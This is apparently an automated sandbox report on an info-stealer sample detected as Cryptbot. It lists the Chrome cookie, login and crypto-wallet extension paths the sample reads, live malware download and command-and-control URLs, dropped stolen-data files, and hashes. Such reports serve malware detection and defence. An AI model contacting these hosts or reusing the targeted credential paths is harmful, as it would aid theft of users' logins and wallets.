Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Remote Access Functionality:

Yara detected Cryptbot

Show sources

Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.1840e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.3360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.1840e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.3360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.929802806.0000000001840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR

Yara detected Glupteba

Show sources

Source: Yara match

File source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Path Interception	Process Injection1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information3	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing21	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	System Information Discovery53	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Application Layer Protocol11	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection1	Cached Domain Credentials	Security Software Discovery31	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Process Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	61%	ReversingLabs	Win32.Trojan.Krypter
file.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.file.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1103431		Download File
0.2.file.exe.1840e50.1.unpack	100%	Avira	HEUR/AGEN.1131354		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://bojwfi01.top/download.php?file=lv.exe	100%	Avira URL Cloud	malware
http://cemnit12.top/index.phpoB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.php7	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpPB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.php?J	0%	Avira URL Cloud	safe
http://cemnit12.top/in-k	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpP	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpQ	0%	Avira URL Cloud	safe
moresh01.top/index.php	100%	Avira URL Cloud	malware
cemnit12.top/index.php	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpF	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpFB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpeB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phphB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.php#	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpMB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phprB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpX	0%	Avira URL Cloud	safe
http://cemnit12.top/index.php#An	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpWB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpZB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.php0	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpyB	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpe	0%	Avira URL Cloud	safe
http://cemnit12.top/index.php&	0%	Avira URL Cloud	safe
http://cemnit12.top/index.phpl	0%	Avira URL Cloud	safe
http://cemnit12.top/index.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cemnit12.top	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
moresh01.top/index.php	true	Avira URL Cloud: malware	low
cemnit12.top/index.php	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://bojwfi01.top/download.php?file=lv.exe	file.exe, file.exe, 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	false		high
http://cemnit12.top/index.phpoB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	false		high
http://cemnit12.top/index.phpB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.php7	file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpPB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.php?J	file.exe, 00000000.00000002.929909251.00000000019FC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/in-k	file.exe, 00000000.00000002.930560853.0000000003F08000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpP	file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	false		high
http://cemnit12.top/index.phpQ	file.exe, 00000000.00000002.930535454.0000000003ED8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpF	file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpFB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpeB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	false		high
http://cemnit12.top/index.phphB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.php#	file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpMB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpb	file.exe, 00000000.00000002.930014729.0000000001A7C000.00000004.00000001.sdmp	false		unknown
http://cemnit12.top/index.phprB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpX	file.exe, 00000000.00000002.930014729.0000000001A7C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.php#An	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpWB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpZB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.php0	file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpyB	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpe	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	false		high
http://cemnit12.top/index.php&	file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.phpl	file.exe, 00000000.00000002.929909251.00000000019FC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cemnit12.top/index.php	file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	501609
Start date:	13.10.2021
Start time:	03:19:50
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/13@73/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 98% Number of executed functions: 47 Number of non-executed functions: 53
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.82.210.154, 95.100.218.79, 2.20.178.10, 2.20.178.56, 20.54.110.249, 40.112.88.60, 52.251.79.25, 20.49.157.6, 2.20.178.24, 2.20.178.33 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/501609/sample/file.exe

Simulations

Behavior and APIs

Time	Type	Description
03:21:12	API Interceptor	19x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_cookies.db Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_key.bin Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.9375
Encrypted:	false
SSDEEP:	3:Tydsb5i6Dn:qqi6D
MD5:	18962F5697042F84578AC7F855F38AC5
SHA1:	3D7CC906C6F649EEBF0E0EBEC809B89B584033E1
SHA-256:	7DDBE41709AE056CDAD2E15C357500D6E5BEBE27D8A708C4069D8C6863A5BE99
SHA-512:	36F5BFEF91BFB07D2A45CFCA5D57126B6D2DCD05BE17AFF40E04B5F1EBB8E1D51A4584BA8F1F3326CA592D9A4D63E13A12C125674ECE0B052EED7B11C52AFF1D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	...*@.0n...PNI~.o.O......M+.YA

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_logins.db Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_webdata.db Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Information.txt Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	20462
Entropy (8bit):	3.5211663508533486
Encrypted:	false
SSDEEP:	384:Dq8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1Faob:DOOpR2J0eDcDDfZmEiv5bJtWmGu37mxw
MD5:	875AD312B785EF11D73066B85DBA49CD
SHA1:	1E6E26CE75CE9D66448E3C339C054ABB18DA56BE
SHA-256:	06008DED2AD0A3311698E1DE2D371F2C475A7EB02D120168D15C1E18B19CF106
SHA-512:	6CD26F5514CBCACE3203AA569B400492FF1CCFE85AEBC1CBAD6CF21A6B6295B6F7B28111FF3F9807AEDF42532079F30F466B43F13CBFA27D136F807EC5722BA3
Malicious:	false
Reputation:	low
Preview:	..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.D.e.s.k.t.o.p.\.f.i.l.e...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .\|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.1.0.-.1.3. .0.4.:.4.1.:.0.8.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .+.0.2.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .j.o.n.e.s. .(.2.8.4.9.9.2.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . . . . . . . . . . .A.M.D. .(.A.T.I.). . .F.i.r.

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Screen_Desktop.jpeg Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	78831
Entropy (8bit):	7.847850529153669
Encrypted:	false
SSDEEP:	1536:IcAB4J5qfo2hlbsuveVJif3uiicy74xXSdNSnJ55d4U7JK:1Ao5qg7OfexcyBdNi3Lt7JK
MD5:	F389B7CB3170C577214F0674A6FAD6D9
SHA1:	FC1ABCF8252A6DFB8493F08C495D88639960703E
SHA-256:	2F0FD80B1057549F47F3A27C1C2DAE1B230C4A9C5C71F81C6D24FC559DDD6242
SHA-512:	9C4C740423336897488156EE014E755F446EE7CC3A5FB263027D5F1CDBA16BF211DC0B98B7A85B42709320A7D3F6A73012DDD2421553B3DFD3BEB925961E80C8
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~....:-.\|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.\|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%..../....qm...+G....3...Z.4.&P.w ..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J+O.vp.......V*..v5....?.._..i9$5..OEz.. z.........

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\_Chrome\default_cookies.db Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\_Chrome\default_key.bin Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.9375
Encrypted:	false
SSDEEP:	3:Tydsb5i6Dn:qqi6D
MD5:	18962F5697042F84578AC7F855F38AC5
SHA1:	3D7CC906C6F649EEBF0E0EBEC809B89B584033E1
SHA-256:	7DDBE41709AE056CDAD2E15C357500D6E5BEBE27D8A708C4069D8C6863A5BE99
SHA-512:	36F5BFEF91BFB07D2A45CFCA5D57126B6D2DCD05BE17AFF40E04B5F1EBB8E1D51A4584BA8F1F3326CA592D9A4D63E13A12C125674ECE0B052EED7B11C52AFF1D
Malicious:	false
Preview:	...*@.0n...PNI~.o.O......M+.YA

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\_Chrome\default_logins.db Download File
Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\_Chrome\default_webdata.db Download File
Process:	C:\Users\user\Desktop\file.exe
